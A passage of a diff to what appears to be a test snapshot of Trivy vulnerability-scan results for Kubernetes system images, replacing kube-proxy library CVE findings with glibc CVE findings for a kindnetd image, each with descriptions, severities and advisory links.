"https://ubuntu.com/security/notices/USN-4416-1", + "https://usn.ubuntu.com/4416-1/", + "https://www.cve.org/CVERecord?id=CVE-2019-19126", ], }, "category": "Vulnerability", - "description": "An out-of-bounds read/write vulnerability was found in e2fsprogs 1.46.5. This issue leads to a segmentation fault and possibly arbitrary code execution via a specially crafted filesystem.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "On the x86-64 architecture, the GNU C Library (aka glibc) before 2.31 fails to ignore the LD_PREFER_MAP_32BIT_EXEC environment variable during program execution after a security transition, allowing local attackers to restrict the possible mapping addresses for loaded libraries and thus bypass ASLR for a setuid program.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "e2fsprogs: out-of-bounds read/write via crafted filesystem", + "name": "glibc: LD_PREFER_MAP_32BIT_EXEC not ignored in setuid binaries", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1304", + "value": "https://avd.aquasec.com/nvd/cve-2019-19126", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8361", + "value": "https://access.redhat.com/security/cve/CVE-2019-19126", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-1304", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19126", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2069726", + "value": "https://linux.oracle.com/cve/CVE-2019-19126.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2069726", + "value": "https://linux.oracle.com/errata/ELSA-2020-3861.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1304", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8361.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4FQ5LC6JOYSOYFPRUZ4S45KL6IP3RPPZ/", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8361", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFJ5E7NWOL6ROE5QVICHKIOUGCPFJVUH/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-1304.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19126", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-8361.html", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25204", }, { "type": "URL", - "value": "https://marc.info/?l=linux-ext4&m=165056234501732&w=2", + "value": "https://sourceware.org/ml/libc-alpha/2019-11/msg00649.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1304", + "value": "https://ubuntu.com/security/notices/USN-4416-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5464-1", + "value": "https://usn.ubuntu.com/4416-1/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-1304", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-19126", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-8457", - "installedVersion": "5.3.28+dfsg1-0.8", - "packageName": "libdb5.3", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-9192", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00074.html", - "https://access.redhat.com/security/cve/CVE-2019-8457", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8457", - "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", - "https://linux.oracle.com/cve/CVE-2019-8457.html", - "https://linux.oracle.com/errata/ELSA-2020-1810.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OPKYSWCOM3CL66RI76TYVIG6TJ263RXH/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SJPFGA45DI4F5MCF2OAACGH3HQOF4G3M/", - "https://nvd.nist.gov/vuln/detail/CVE-2019-8457", - "https://security.netapp.com/advisory/ntap-20190606-0002/", - "https://ubuntu.com/security/notices/USN-4004-1", - "https://ubuntu.com/security/notices/USN-4004-2", - "https://ubuntu.com/security/notices/USN-4019-1", - "https://ubuntu.com/security/notices/USN-4019-2", - "https://usn.ubuntu.com/4004-1/", - "https://usn.ubuntu.com/4004-2/", - "https://usn.ubuntu.com/4019-1/", - "https://usn.ubuntu.com/4019-2/", - "https://www.cve.org/CVERecord?id=CVE-2019-8457", - "https://www.oracle.com/security-alerts/cpuapr2020.html", - "https://www.oracle.com/security-alerts/cpujan2020.html", - "https://www.oracle.com/security-alerts/cpujul2020.html", - "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", - "https://www.sqlite.org/releaselog/3_28_0.html", - "https://www.sqlite.org/src/info/90acdbfce9c08858", + "https://access.redhat.com/security/cve/CVE-2019-9192", + "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", + "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", + "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "https://www.cve.org/CVERecord?id=CVE-2019-9192", ], }, "category": "Vulnerability", - "description": "SQLite3 from 3.6.0 to and including 3.27.2 is vulnerable to heap out-of-bound read in the rtreenode() function when handling invalid rtree tables.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "sqlite: heap out-of-bound read in function rtreenode()", + "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-8457", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00074.html", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-8457", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8457", - }, - { - "type": "URL", - "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-8457.html", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-1810.html", - }, - { - "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OPKYSWCOM3CL66RI76TYVIG6TJ263RXH/", - }, - { - "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SJPFGA45DI4F5MCF2OAACGH3HQOF4G3M/", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-8457", - }, - { - "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20190606-0002/", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4004-1", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4004-2", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4019-1", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4019-2", - }, - { - "type": "URL", - "value": "https://usn.ubuntu.com/4004-1/", - }, - { - "type": "URL", - "value": "https://usn.ubuntu.com/4004-2/", - }, - { - "type": "URL", - "value": "https://usn.ubuntu.com/4019-1/", - }, - { - "type": "URL", - "value": "https://usn.ubuntu.com/4019-2/", - }, - { - "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-8457", - }, - { - "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2020.html", + "value": "https://avd.aquasec.com/nvd/cve-2019-9192", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2020.html", + "value": "https://access.redhat.com/security/cve/CVE-2019-9192", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2020.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", }, { "type": "URL", - "value": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", }, { "type": "URL", - "value": "https://www.sqlite.org/releaselog/3_28_0.html", + "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://www.sqlite.org/src/info/90acdbfce9c08858", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-9192", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-33560", - "installedVersion": "1.8.7-6", - "packageName": "libgcrypt20", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-27645", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33560.json", - "https://access.redhat.com/security/cve/CVE-2021-33560", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33560", - "https://dev.gnupg.org/T5305", - "https://dev.gnupg.org/T5328", - "https://dev.gnupg.org/T5466", - "https://dev.gnupg.org/rCe8b7f10be275bcedb5fc05ed4837a89bfd605c61", - "https://eprint.iacr.org/2021/923", - "https://errata.almalinux.org/8/ALSA-2021-4409.html", - "https://linux.oracle.com/cve/CVE-2021-33560.html", - "https://linux.oracle.com/errata/ELSA-2022-9263.html", - "https://lists.debian.org/debian-lts-announce/2021/06/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BKKTOIGFW2SGN3DO2UHHVZ7MJSYN4AAB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R7OAPCUGPF3VLA7QAJUQSL255D4ITVTL/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-33560", - "https://security.gentoo.org/glsa/202210-13", - "https://ubuntu.com/security/notices/USN-5080-1", - "https://ubuntu.com/security/notices/USN-5080-2", - "https://www.cve.org/CVERecord?id=CVE-2021-33560", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2022.html", - "https://www.oracle.com/security-alerts/cpujul2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://access.redhat.com/security/cve/CVE-2021-27645", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27645", + "https://linux.oracle.com/cve/CVE-2021-27645.html", + "https://linux.oracle.com/errata/ELSA-2021-9560.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LZNT6KTMCCWPWXEOGSHD3YLYZKUGMH5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I7TS26LIZSOBLGJEZMJX4PXT5BQDE2WS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-27645", + "https://security.gentoo.org/glsa/202107-07", + "https://sourceware.org/bugzilla/show_bug.cgi?id=27462", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://www.cve.org/CVERecord?id=CVE-2021-27645", ], }, "category": "Vulnerability", - "description": "Libgcrypt before 1.8.8 and 1.9.x before 1.9.3 mishandles ElGamal encryption because it lacks exponent blinding to address a side-channel attack against mpi_powm, and the window size is not chosen appropriately. This, for example, affects use of ElGamal in OpenPGP.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The nameserver caching daemon (nscd) in the GNU C Library (aka glibc or libc6) 2.29 through 2.33, when processing a request for netgroup lookup, may crash due to a double-free, potentially resulting in degraded service or Denial of Service on the local system. This is related to netgroupcache.c.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "libgcrypt: mishandles ElGamal encryption because it lacks exponent blinding to address a side-channel attack against mpi_powm", + "name": "glibc: Use-after-free in addgetnetgrentX function in netgroupcache.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-33560", - }, - { - "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33560.json", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-33560", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33560", - }, - { - "type": "URL", - "value": "https://dev.gnupg.org/T5305", - }, - { - "type": "URL", - "value": "https://dev.gnupg.org/T5328", - }, - { - "type": "URL", - "value": "https://dev.gnupg.org/T5466", - }, - { - "type": "URL", - "value": "https://dev.gnupg.org/rCe8b7f10be275bcedb5fc05ed4837a89bfd605c61", - }, - { - "type": "URL", - "value": "https://eprint.iacr.org/2021/923", - }, - { - "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4409.html", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-33560.html", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9263.html", - }, - { - "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/06/msg00021.html", - }, - { - "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BKKTOIGFW2SGN3DO2UHHVZ7MJSYN4AAB/", - }, - { - "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R7OAPCUGPF3VLA7QAJUQSL255D4ITVTL/", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33560", - }, - { - "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-13", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5080-1", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5080-2", - }, - { - "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-33560", + "value": "https://avd.aquasec.com/nvd/cve-2021-27645", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://access.redhat.com/security/cve/CVE-2021-27645", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27645", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://linux.oracle.com/cve/CVE-2021-27645.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-6829", - "installedVersion": "1.8.7-6", - "packageName": "libgcrypt20", - "references": [ - "https://access.redhat.com/security/cve/CVE-2018-6829", - "https://github.com/weikengchen/attack-on-libgcrypt-elgamal", - "https://github.com/weikengchen/attack-on-libgcrypt-elgamal/wiki", - "https://lists.gnupg.org/pipermail/gcrypt-devel/2018-February/004394.html", - "https://nvd.nist.gov/vuln/detail/CVE-2018-6829", - "https://www.cve.org/CVERecord?id=CVE-2018-6829", - "https://www.oracle.com/security-alerts/cpujan2020.html", - ], - }, - "category": "Vulnerability", - "description": "cipher/elgamal.c in Libgcrypt through 1.8.2, when used to encrypt messages directly, improperly encodes plaintexts, which allows attackers to obtain sensitive information by reading ciphertext data (i.e., it does not have semantic security in face of a ciphertext-only attack). The Decisional Diffie-Hellman (DDH) assumption does not hold for Libgcrypt's ElGamal implementation.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "libgcrypt: ElGamal implementation doesn't have semantic security due to incorrectly encoded plaintexts possibly allowing to obtain sensitive information", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-6829", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-6829", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LZNT6KTMCCWPWXEOGSHD3YLYZKUGMH5/", }, { "type": "URL", - "value": "https://github.com/weikengchen/attack-on-libgcrypt-elgamal", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I7TS26LIZSOBLGJEZMJX4PXT5BQDE2WS/", }, { "type": "URL", - "value": "https://github.com/weikengchen/attack-on-libgcrypt-elgamal/wiki", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-27645", }, { "type": "URL", - "value": "https://lists.gnupg.org/pipermail/gcrypt-devel/2018-February/004394.html", + "value": "https://security.gentoo.org/glsa/202107-07", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-6829", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27462", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-6829", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2020.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-27645", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": "3.7.1-5+deb11u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-2509", - "installedVersion": "3.7.1-5", - "packageName": "libgnutls30", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-33574", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://access.redhat.com/errata/RHSA-2022:6854", - "https://access.redhat.com/security/cve/CVE-2022-2509", - "https://bugzilla.redhat.com/2108977", - "https://bugzilla.redhat.com/show_bug.cgi?id=2076626", - "https://bugzilla.redhat.com/show_bug.cgi?id=2108635", - "https://bugzilla.redhat.com/show_bug.cgi?id=2108977", - "https://bugzilla.redhat.com/show_bug.cgi?id=2119770", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2509", - "https://errata.almalinux.org/9/ALSA-2022-6854.html", - "https://errata.rockylinux.org/RLSA-2022:6854", - "https://gnutls.org/security-new.html (GNUTLS-SA-2022-07-07)", - "https://gnutls.org/security-new.html#GNUTLS-SA-2022-07-07", - "https://linux.oracle.com/cve/CVE-2022-2509.html", - "https://linux.oracle.com/errata/ELSA-2022-7105.html", - "https://lists.debian.org/debian-lts-announce/2022/08/msg00002.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6FL27JS3VM74YEQU7PGB62USO3KSBYZX/", - "https://lists.gnupg.org/pipermail/gnutls-help/2022-July/004746.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-2509", - "https://ubuntu.com/security/notices/USN-5550-1", - "https://www.cve.org/CVERecord?id=CVE-2022-2509", - "https://www.debian.org/security/2022/dsa-5203", + "https://access.redhat.com/security/cve/CVE-2021-33574", + "https://linux.oracle.com/cve/CVE-2021-33574.html", + "https://linux.oracle.com/errata/ELSA-2021-9560.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KJYYIMDDYOHTP2PORLABTOHYQYYREZDD/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RBUUWUGXVILQXVWEOU7N42ICHPJNAEUP/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-33574", + "https://security.gentoo.org/glsa/202107-07", + "https://security.netapp.com/advisory/ntap-20210629-0005/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=27896", + "https://sourceware.org/bugzilla/show_bug.cgi?id=27896#c1", + "https://www.cve.org/CVERecord?id=CVE-2021-33574", ], }, "category": "Vulnerability", - "description": "A vulnerability found in gnutls. This security flaw happens because of a double free error occurs during verification of pkcs7 signatures in gnutls_pkcs7_verify function.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The mq_notify function in the GNU C Library (aka glibc) versions 2.32 and 2.33 has a use-after-free. It may use the notification thread attributes object (passed through its struct sigevent parameter) after it has been freed by the caller, leading to a denial of service (application crash) or possibly unspecified other impact.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "Double free during gnutls_pkcs7_verify", + "name": "glibc: mq_notify does not handle separately allocated thread attributes", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-2509", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:6854", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-2509", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2108977", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2076626", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2108635", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2108977", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2119770", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2509", - }, - { - "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-6854.html", + "value": "https://avd.aquasec.com/nvd/cve-2021-33574", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:6854", + "value": "https://access.redhat.com/security/cve/CVE-2021-33574", }, { "type": "URL", - "value": "https://gnutls.org/security-new.html (GNUTLS-SA-2022-07-07)", + "value": "https://linux.oracle.com/cve/CVE-2021-33574.html", }, { "type": "URL", - "value": "https://gnutls.org/security-new.html#GNUTLS-SA-2022-07-07", + "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-2509.html", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-7105.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KJYYIMDDYOHTP2PORLABTOHYQYYREZDD/", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/08/msg00002.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RBUUWUGXVILQXVWEOU7N42ICHPJNAEUP/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6FL27JS3VM74YEQU7PGB62USO3KSBYZX/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33574", }, { "type": "URL", - "value": "https://lists.gnupg.org/pipermail/gnutls-help/2022-July/004746.html", + "value": "https://security.gentoo.org/glsa/202107-07", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2509", + "value": "https://security.netapp.com/advisory/ntap-20210629-0005/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5550-1", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27896", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-2509", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27896#c1", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5203", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-33574", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "3.7.1-5+deb11u3", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0361", - "installedVersion": "3.7.1-5", - "packageName": "libgnutls30", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-35942", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://access.redhat.com/errata/RHSA-2023:1141", - "https://access.redhat.com/security/cve/CVE-2023-0361", - "https://bugzilla.redhat.com/2162596", - "https://bugzilla.redhat.com/show_bug.cgi?id=2131152", - "https://bugzilla.redhat.com/show_bug.cgi?id=2162596", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0361", - "https://errata.almalinux.org/9/ALSA-2023-1141.html", - "https://errata.rockylinux.org/RLSA-2023:1569", - "https://github.com/tlsfuzzer/tlsfuzzer/pull/679", - "https://gitlab.com/gnutls/gnutls/-/issues/1050", - "https://gnutls.org/security-new.html#GNUTLS-SA-2020-07-14", - "https://linux.oracle.com/cve/CVE-2023-0361.html", - "https://linux.oracle.com/errata/ELSA-2023-1569.html", - "https://lists.debian.org/debian-lts-announce/2023/02/msg00015.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UFIA3X4IZ3CW7SRQ2UHNHNPMRIAWF2FI/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WS4KVDOG6QTALWHC2QE4Y7VPDRMLTRWQ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z634YBXAJ5VLDI62IOPBVP5K6YFHAWCY/", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0361", - "https://security.netapp.com/advisory/ntap-20230324-0005/", - "https://ubuntu.com/security/notices/USN-5901-1", - "https://www.cve.org/CVERecord?id=CVE-2023-0361", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-35942.json", + "https://access.redhat.com/security/cve/CVE-2021-35942", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35942", + "https://linux.oracle.com/cve/CVE-2021-35942.html", + "https://linux.oracle.com/errata/ELSA-2021-9560.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-35942", + "https://security.gentoo.org/glsa/202208-24", + "https://security.netapp.com/advisory/ntap-20210827-0005/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=28011", + "https://sourceware.org/git/?p=glibc.git;a=commit;h=5adda61f62b77384718b4c0d8336ade8f2b4b35c", + "https://sourceware.org/glibc/wiki/Security%20Exceptions", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5699-1", + "https://www.cve.org/CVERecord?id=CVE-2021-35942", ], }, "category": "Vulnerability", - "description": "A timing side-channel in the handling of RSA ClientKeyExchange messages was discovered in GnuTLS. This side-channel can be sufficient to recover the key encrypted in the RSA ciphertext across a network in a Bleichenbacher style attack. To achieve a successful decryption the attacker would need to send a large amount of specially crafted messages to the vulnerable server. By recovering the secret from the ClientKeyExchange message, the attacker would be able to decrypt the application data exchanged over that connection.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The wordexp function in the GNU C Library (aka glibc) through 2.33 may crash or read arbitrary memory in parse_param (in posix/wordexp.c) when called with an untrusted, crafted pattern, potentially resulting in a denial of service or disclosure of information. This occurs because atoi was used but strtoul should have been used to ensure correct calculations.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "timing side-channel in the TLS RSA key exchange code", + "name": "glibc: Arbitrary read in wordexp()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0361", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:1141", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0361", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2162596", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2131152", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2162596", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0361", + "value": "https://avd.aquasec.com/nvd/cve-2021-35942", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-1141.html", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-35942.json", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:1569", + "value": "https://access.redhat.com/security/cve/CVE-2021-35942", }, { "type": "URL", - "value": "https://github.com/tlsfuzzer/tlsfuzzer/pull/679", + "value": 